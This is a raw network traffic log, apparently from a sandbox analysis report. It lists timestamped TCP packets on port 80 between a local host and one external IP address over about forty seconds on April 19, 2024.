                                                                                                                                    Apr 19, 2024 13:43:05.033744097 CEST4979680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:05.138107061 CEST8049795104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:05.138171911 CEST8049796104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:05.138248920 CEST4979680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:05.138317108 CEST4979580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:05.138351917 CEST4979680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:05.243096113 CEST8049796104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:05.243153095 CEST8049796104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:05.243311882 CEST4979680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:05.348340988 CEST8049796104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:05.511735916 CEST8049796104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:05.511800051 CEST8049796104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:05.511857033 CEST4979680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:05.688608885 CEST4979780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:05.793008089 CEST8049797104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:05.793180943 CEST4979780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:13.584152937 CEST4981080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:13.584551096 CEST8049811104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:13.584631920 CEST4981180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:13.585453033 CEST4981180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:13.689943075 CEST8049811104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:13.690002918 CEST8049811104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:13.690309048 CEST4981180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:13.795145035 CEST8049811104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.046247959 CEST8049811104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.046308994 CEST8049811104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.046374083 CEST4981180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.309772015 CEST4981180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.310522079 CEST4981280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.415235996 CEST8049812104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.415299892 CEST8049811104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.415397882 CEST4981180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.415512085 CEST4981280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.415581942 CEST4981280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.461733103 CEST4981380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.461971045 CEST4981280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.520011902 CEST8049812104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.520068884 CEST8049812104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.520312071 CEST4981280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.566137075 CEST8049813104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.566221952 CEST4981380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.566323996 CEST4981380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.567332029 CEST8049812104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.567502022 CEST4981280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.585042953 CEST4981480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.670665979 CEST8049813104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.670918941 CEST8049813104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.671087027 CEST4981380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.689589977 CEST8049814104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.689846992 CEST4981480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.689846992 CEST4981480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.775266886 CEST8049813104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.794198990 CEST8049814104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.794557095 CEST8049814104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.795125961 CEST4981480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:14.899743080 CEST8049814104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.961277962 CEST8049813104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.961371899 CEST8049813104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:14.961473942 CEST4981380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.094398022 CEST8049814104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.094460964 CEST8049814104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.094665051 CEST4981480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.225455046 CEST4981380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.225630999 CEST4981480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.226735115 CEST4981580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.331106901 CEST8049814104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.331341982 CEST4981480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.331621885 CEST8049813104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.331696987 CEST4981380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.331765890 CEST8049815104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.331846952 CEST4981580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.332034111 CEST4981580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.436280966 CEST8049815104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.436494112 CEST8049815104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.436656952 CEST4981580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.541723013 CEST8049815104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.727946043 CEST8049815104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.728005886 CEST8049815104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.728193998 CEST4981580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.876406908 CEST4981580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.877032042 CEST4981680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.984019995 CEST8049816104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.984044075 CEST8049815104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:15.984213114 CEST4981580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.984247923 CEST4981680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:15.984397888 CEST4981680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:16.088443995 CEST8049816104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:16.088918924 CEST8049816104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:16.089243889 CEST4981680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:16.193670988 CEST8049816104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:16.452214003 CEST8049816104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:16.452276945 CEST8049816104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:16.452483892 CEST4981680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:16.566442013 CEST4981680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:16.566780090 CEST4981780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:16.670928001 CEST8049816104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:16.671524048 CEST8049817104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:16.671631098 CEST4981680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:16.671730995 CEST4981780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:16.671962023 CEST4981780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:16.776298046 CEST8049817104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:16.776695013 CEST8049817104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:16.776875019 CEST4981780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:16.881537914 CEST8049817104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:17.150342941 CEST8049817104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:17.150393009 CEST8049817104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:17.150557041 CEST4981780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:17.269581079 CEST4981780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:17.270160913 CEST4981880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:17.376245975 CEST8049818104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:17.376303911 CEST8049817104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:17.376310110 CEST4981880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:17.376353979 CEST4981780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:17.376467943 CEST4981880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:17.480829954 CEST8049818104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:17.481291056 CEST8049818104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:17.481436968 CEST4981880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:17.586317062 CEST8049818104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:17.833276987 CEST8049818104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:17.833338022 CEST8049818104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:17.833477974 CEST4981880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:17.970220089 CEST4981880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:17.970789909 CEST4981980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.075375080 CEST8049818104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:18.075438023 CEST8049819104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:18.075536966 CEST4981880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.075546026 CEST4981980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.075875044 CEST4981980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.180079937 CEST8049819104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:18.180556059 CEST8049819104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:18.180996895 CEST4981980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.285744905 CEST8049819104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:18.548439980 CEST8049819104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:18.548502922 CEST8049819104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:18.548582077 CEST4981980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.675920963 CEST4981980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.676521063 CEST4982080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.780884027 CEST8049819104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:18.780947924 CEST8049820104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:18.780997992 CEST4981980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.781224012 CEST4982080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.781610012 CEST4982080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.886363029 CEST8049820104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:18.886423111 CEST8049820104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:18.886598110 CEST4982080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:18.991000891 CEST8049820104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:19.140554905 CEST8049820104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:19.140613079 CEST8049820104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:19.140810013 CEST4982080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:19.651223898 CEST4982080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:19.651355982 CEST4982180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:19.756268024 CEST8049821104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:19.756808996 CEST8049820104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:19.756908894 CEST4982180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:19.757010937 CEST4982080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:27.858108044 CEST4983280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:27.965022087 CEST8049834104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:27.965120077 CEST8049834104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:27.965290070 CEST4983480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:28.069773912 CEST8049834104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:28.227858067 CEST8049834104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:28.227886915 CEST8049834104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:28.227963924 CEST4983480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:28.347927094 CEST4983580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:28.452564955 CEST8049835104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:28.455665112 CEST4983580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:28.455799103 CEST4983580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:28.560236931 CEST8049835104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:28.560292959 CEST8049835104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:28.560431004 CEST4983580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:28.664913893 CEST8049835104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:28.909697056 CEST8049835104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:28.909761906 CEST8049835104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:28.909918070 CEST4983580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.034483910 CEST4983580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.034498930 CEST4983680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.139014006 CEST8049836104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:29.139669895 CEST4983680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.139802933 CEST4983680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.140170097 CEST8049835104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:29.140228033 CEST4983580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.244211912 CEST8049836104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:29.244271994 CEST8049836104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:29.244447947 CEST4983680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.348836899 CEST8049836104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:29.515619040 CEST8049836104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:29.515662909 CEST8049836104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:29.515841961 CEST4983680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.627809048 CEST4983480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.627859116 CEST4979680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.629446983 CEST4983680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.629952908 CEST4983780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.733841896 CEST8049836104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:29.733947039 CEST8049837104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:29.733943939 CEST4983680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.734117031 CEST4983780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.734255075 CEST4983780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.838252068 CEST8049837104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:29.838352919 CEST8049837104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:29.838499069 CEST4983780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:29.942517042 CEST8049837104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:30.220585108 CEST8049837104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:30.220832109 CEST8049837104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:30.220901012 CEST4983780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:30.378180981 CEST4983780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:30.378819942 CEST4983880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:30.482537985 CEST8049837104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:30.482639074 CEST4983780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:30.482796907 CEST8049838104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:30.482878923 CEST4983880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:30.483052969 CEST4983880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:30.587027073 CEST8049838104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:30.587064981 CEST8049838104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:30.587222099 CEST4983880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:30.691447973 CEST8049838104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:30.847598076 CEST8049838104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:30.847640038 CEST8049838104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:30.847739935 CEST4983880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:30.971322060 CEST4983880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:30.971606016 CEST4983980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.075934887 CEST8049839104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:31.076056957 CEST8049838104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:31.076060057 CEST4983980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.076121092 CEST4983880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.076318026 CEST4983980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.180469036 CEST8049839104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:31.181094885 CEST8049839104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:31.181261063 CEST4983980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.290025949 CEST8049839104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:31.555847883 CEST8049839104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:31.555908918 CEST8049839104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:31.556034088 CEST4983980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.677140951 CEST4983980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.677691936 CEST4984080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.782089949 CEST8049840104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:31.782195091 CEST4984080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.782316923 CEST4984080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.782516956 CEST8049839104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:31.782563925 CEST4983980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.886843920 CEST8049840104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:31.886909008 CEST8049840104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:31.887115955 CEST4984080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:31.991712093 CEST8049840104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.236135006 CEST8049840104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.236185074 CEST8049840104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.236254930 CEST4984080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.363847017 CEST4984080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.364470005 CEST4984180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.461431026 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.468322992 CEST8049840104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.468441010 CEST8049841104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.468516111 CEST4984080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.468523026 CEST4984180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.565773964 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.567662001 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.567759991 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.581789017 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.672112942 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.672477961 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.672622919 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.686937094 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.687002897 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.687083006 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.776738882 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.791264057 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.791620016 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.791925907 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.896178961 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.034478903 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.034519911 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.034692049 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.072165012 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.072201967 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.072268009 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.195871115 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.195895910 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.196468115 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.300447941 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.300561905 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.300590992 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.300682068 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.300807953 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.301224947 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.301302910 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.404580116 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.404798985 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.404993057 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.509011030 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.685295105 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.685344934 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.685391903 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.800986052 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.802793026 CEST4984580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.905716896 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.954305887 CEST4985880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:43.059468031 CEST8049858104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.059529066 CEST8049858104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.059720993 CEST4985880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:43.164284945 CEST8049858104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.310870886 CEST8049858104.21.57.61192.168.2.4
